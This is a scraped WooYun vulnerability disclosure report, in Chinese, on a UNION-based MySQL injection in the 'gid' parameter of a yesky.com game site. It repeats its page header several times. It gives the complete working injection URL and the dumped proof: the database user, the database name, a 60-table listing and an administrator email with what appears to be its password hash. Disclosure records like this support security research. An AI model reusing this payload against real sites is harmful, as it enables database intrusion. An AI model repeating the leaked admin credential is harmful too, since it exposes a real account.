天极网某站点MySQL注射(支持union) | wooyun-2014-083910| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-083910

漏洞标题：天极网某站点MySQL注射(支持union)

漏洞作者： lijiejie

提交时间：2014-11-20 00:28

修复时间：2015-01-04 00:30

公开时间：2015-01-04 00:30

漏洞类型：SQL注射漏洞

危害等级：中

自评Rank：5

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2014-11-20：细节已通知厂商并且等待厂商处理中
2014-11-20：厂商已经确认，细节仅向厂商公开
2014-11-30：细节向核心白帽子及相关领域专家公开
2014-12-10：细节向普通白帽子公开
2014-12-20：细节向实习白帽子公开
2015-01-04：细节向公众公开

简要描述：

天极网某站点MySQL注射(支持union)

详细说明：

<code http://g.yesky.com/hall/server_info?gid=-9169%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CCONCAT%280x5e5e5e%2CIFNULL%28CAST%28user%28%29%20AS%20CHAR%29%2C0x20%29%2C0x5e5e5e%29%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23&_=1416385564486></code>
参数gid可注入，支持union。

漏洞证明：

当前用户： [email protected]
当前库： yeskygame
数据表：

Database: yeskygame
[60 tables]
+---------------------------+
| mygame_ad                 |
| mygame_ad_where           |
| mygame_admin_exec_log     |
| mygame_admin_login_error  |
| mygame_admin_pay          |
| mygame_admin_role         |
| mygame_article            |
| mygame_card               |
| mygame_card_log           |
| mygame_category           |
| mygame_category_list      |
| mygame_cps                |
| mygame_game               |
| mygame_game_log           |
| mygame_gametype           |
| mygame_link               |
| mygame_manager            |
| mygame_member             |
| mygame_member_extend_info |
| mygame_menu               |
| mygame_pay_ok             |
| mygame_pay_type           |
| mygame_role_access        |
| mygame_server             |
| mygame_soical_login       |
| mygame_spend_log          |
| mygame_statistical        |
| mygame_web_not_allow_ip   |
| mygame_webconfig          |
| uc_admins                 |
| uc_applications           |
| uc_badwords               |
| uc_domains                |
| uc_failedlogins           |
| uc_feeds                  |
| uc_friends                |
| uc_mailqueue              |
| uc_memberfields           |
| uc_members                |
| uc_mergemembers           |
| uc_newpm                  |
| uc_notelist               |
| uc_pm_indexes             |
| uc_pm_lists               |
| uc_pm_members             |
| uc_pm_messages_0          |
| uc_pm_messages_1          |
| uc_pm_messages_2          |
| uc_pm_messages_3          |
| uc_pm_messages_4          |
| uc_pm_messages_5          |
| uc_pm_messages_6          |
| uc_pm_messages_7          |
| uc_pm_messages_8          |
| uc_pm_messages_9          |
| uc_protectedmembers       |
| uc_settings               |
| uc_sqlcache               |
| uc_tags                   |
| uc_vars                   |
+---------------------------+

管理员：

[email protected]    691f083f979775088de7465b523ef253

修复方案：

过滤

版权声明：转载请注明来源 lijiejie@乌云

漏洞回应

厂商回应：

危害等级：低

漏洞Rank：3

确认时间：2014-11-20 08:34

厂商回复：

非常感谢您对我们公司安全工作的关注。

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-083910

漏洞标题：天极网某站点MySQL注射(支持union)

相关厂商：天极传媒集团

漏洞作者： lijiejie

提交时间：2014-11-20 00:28

修复时间：2015-01-04 00:30

公开时间：2015-01-04 00:30

漏洞类型：SQL注射漏洞

危害等级：中

自评Rank：5

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 lijiejie@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-083910

漏洞标题：天极网某站点MySQL注射(支持union)

相关厂商：天极传媒集团

漏洞作者： lijiejie

提交时间：2014-11-20 00:28

修复时间：2015-01-04 00:30

公开时间：2015-01-04 00:30

漏洞类型：SQL注射漏洞

危害等级：中

自评Rank：5

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2014-083910"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 lijiejie@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

Tags标签：无

4人收藏收藏
分享漏洞：